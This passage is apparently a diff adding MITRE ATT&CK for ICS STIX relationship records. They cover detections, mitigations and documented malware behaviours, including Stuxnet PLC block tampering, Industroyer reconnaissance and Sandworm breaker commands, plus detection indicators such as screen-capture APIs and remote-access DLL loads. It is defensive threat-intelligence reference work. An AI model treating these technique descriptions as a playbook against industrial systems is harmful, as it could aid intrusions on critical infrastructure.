primary channel.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c63c35c2-a402-4d0d-bf25-f48eb9b379c1", + "created": "2022-05-11T16:22:58.807Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:26:20.823Z", + "description": "Spoofed reporting messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Spoofed messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for many benign reasons. Monitor reporting messages for changes in how they are constructed.\n\nVarious techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f45c2df8-30e7-45d0-8067-7b2870767574", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:28:22.574Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. 
The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d50a3d89-c8fa-4c5d-813e-f4495d892d1a", + "created": "2019-03-25T19:13:54.947Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:32:23.717Z", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) can move laterally through industrial networks by means of the SMB service. 
(Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--56672ea4-cbf0-4a3e-8aed-edcc7d33133b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.075Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3e956d93-e011-40de-ab1b-3f32fa73ae41", + "created": "2022-09-26T19:30:14.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:15:05.195Z", + "description": "Monitor DLL file events, specifically creation of these files as well as the loading of DLLs into processes specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--641813ea-66a9-4949-848f-db83420aac39", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:56:04.784Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) issued unauthorized commands to substation breakers after gaining control of operator workstations and accessing a distribution management system (DMS) client application. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c6562519-81c5-4eca-a815-f46ac0ed4bcc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices 
have limits on the number of simultaneous sessions they support.\n",
+ "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a",
+ "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--97df42a5-e6d3-4fb7-a158-c161d14624ab",
+ "created": "2022-05-11T16:22:58.806Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-09-26T16:59:40.539Z",
+ "description": "Monitor device application logs parameter changes, although not all devices will produce such logs.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+ "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--ebc34374-2dee-4dc1-b0b7-f31ae94dab11",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.175Z",
+ "relationship_type": "mitigates",
+ "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n",
+ "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac",
+ "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ 
"x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab",
+ "created": "2022-05-11T16:22:58.807Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T16:31:22.665Z",
+ "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd",
+ "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--19ab6776-42de-48af-975a-568d31a3bb66",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.152Z",
+ "relationship_type": "mitigates",
+ "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. 
(Citation: Department of Homeland Security September 2016) (Citation: N/A)\n",
+ "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291",
+ "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92",
+ "external_references": [
+ {
+ "source_name": "Department of Homeland Security September 2016",
+ "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ",
+ "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
+ },
+ {
+ "source_name": "N/A",
+ "description": "N/A Department of Homeland Security 2016, September Retrieved. 2020/09/25 Alarm Management for Process Control Retrieved. 2020/09/25 ",
+ "url": "https://www.exida.com/images/uploads/18492275-Alarm-Management-for-Process-Control.pdf"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--841ec349-0f4c-43fa-89b8-ef3656497fc9",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Anton Cherepanov, ESET June 2017",
+ "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-09-23T18:49:11.920Z",
+ "description": "[Industroyer](https://attack.mitre.org/software/S0604) contains an IEC 61850 module that enumerates all connected network adapters to determine their TCP/IP subnet masks. 
(Citation: Anton Cherepanov, ESET June 2017)",
+ "relationship_type": "uses",
+ "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808",
+ "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--b1768154-221c-48be-ab2b-549ec1eddafb",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.068Z",
+ "relationship_type": "mitigates",
+ "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n",
+ "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291",
+ "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc",
+ "external_references": [
+ {
+ "source_name": "Karen Scarfone; Paul Hoffman September 2009",
+ "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ",
+ "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf"
+ },
+ {
+ "source_name": "Keith Stouffer May 2015",
+ "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
2018/03/28 ",
+ "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
+ },
+ {
+ "source_name": "Department of Homeland Security September 2016",
+ "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ",
+ "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
+ },
+ {
+ "source_name": "Dwight Anderson 2014",
+ "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ",
+ "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--ce64ed04-f0ff-4897-b636-3177c9c5d9bb",
+ "type": "relationship",
+ "created": "2021-01-20T21:03:13.436Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "US District Court Indictment GRU Unit 74455 October 2020",
+ "url": "https://www.justice.gov/opa/press-release/file/1328521/download",
+ "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020."
+ },
+ {
+ "source_name": "Secureworks IRON VIKING ",
+ "url": "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." 
+ }
+ ],
+ "modified": "2022-02-28T17:02:50.467Z",
+ "description": "(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Secureworks IRON VIKING )",
+ "relationship_type": "uses",
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--29b85313-645b-4fb1-b5c2-f580d111760b",
+ "created": "2022-09-26T19:38:04.844Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T19:36:50.910Z",
+ "description": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \"0\" indicates LLMNR is disabled.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
+ "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--c69eab3c-861c-45f5-8858-a595fcc7e6f6",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.132Z",
+ "relationship_type": "mitigates",
+ "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the 
network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: Gardiner, J., Cova, M., Nagaraja, S February 2014)\n",
+ "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc",
+ "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d",
+ "external_references": [
+ {
+ "source_name": "Gardiner, J., Cova, M., Nagaraja, S February 2014",
+ "description": "Gardiner, J., Cova, M., Nagaraja, S 2014, February Command & Control Understanding, Denying and Detecting Retrieved. 2016/04/20 ",
+ "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--cfcbca89-8912-40c0-ac15-47882162b132",
+ "created": "2022-05-11T16:22:58.808Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-09-26T19:00:16.899Z",
+ "description": "Monitor application logs for new or unexpected devices or sessions on wireless networks.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+ "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": 
"relationship--bc383819-2e40-49b4-bea9-95eb5d418877",
+ "created": "2017-12-14T16:46:06.044Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
+ "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ",
+ "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-09-20T21:15:38.341Z",
+ "description": "[Stuxnet](https://attack.mitre.org/software/S0603) uses a thread to monitor a data block DB890 of sequence A or B. This thread is constantly running and probing this block (every 5 minutes). On an infected PLC, if block DB890 is found and contains a special magic value (used by Stuxnet to identify his own block DB890), this blocks data can be read and written. This thread is likely used to optimize the way sequences A and B work, and modify their behavior when the Step7 editor is opened. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)",
+ "relationship_type": "uses",
+ "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4",
+ "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--51f9963c-c041-4bec-b482-5fda2fb5bca4",
+ "created": "2019-06-24T17:20:24.258Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Catalin Cimpanu April 2016",
+ "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ",
+ "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-12T17:39:25.984Z",
+ "description": "A [Conficker](https://attack.mitre.org/software/S0608) infection at a nuclear power plant forced the facility to shutdown and go through security procedures involved with such events, with its staff scanning computer systems and going through all the regular checks and motions before putting the plant back into production. 
(Citation: Catalin Cimpanu April 2016)",
+ "relationship_type": "uses",
+ "source_ref": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55",
+ "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--c11a95c2-6e9d-4d90-b6ab-20227869f2e4",
+ "created": "2022-05-11T16:22:58.807Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "CopyFromScreen .NET",
+ "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.",
+ "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8"
+ },
+ {
+ "source_name": "Antiquated Mac Malware",
+ "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T19:38:15.307Z",
+ "description": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. 
Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) The data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+ "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--b9632b4d-43c3-4bfa-88e0-629245acb8eb",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.091Z",
+ "relationship_type": "mitigates",
+ "description": "Ensure users and user groups have appropriate permissions for their roles through Identity and Access Management (IAM) controls to prevent misuse. 
Implement user accounts for each individual that may access the repositories for role enforcement and non-repudiation of actions.\n",
+ "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48",
+ "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--7a55fc66-0d5c-4ef6-af28-d4a4bb84381d",
+ "created": "2017-12-14T16:46:06.044Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Hydro",
+ "description": "Hydro Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 Retrieved. 2019/10/16 ",
+ "url": "https://www.hydro.com/en/media/on-the-agenda/cyber-attack/"
+ },
+ {
+ "source_name": "Kevin Beaumont",
+ "description": "Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 ",
+ "url": "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-12T17:56:48.612Z",
+ "description": "Some of Norsk Hydro's production systems were impacted by a [LockerGoga](https://attack.mitre.org/software/S0372) infection. This resulted in a loss of view which forced the company to switch to manual operations. 
(Citation: Kevin Beaumont) (Citation: Hydro)",
+ "relationship_type": "uses",
+ "source_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48",
+ "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
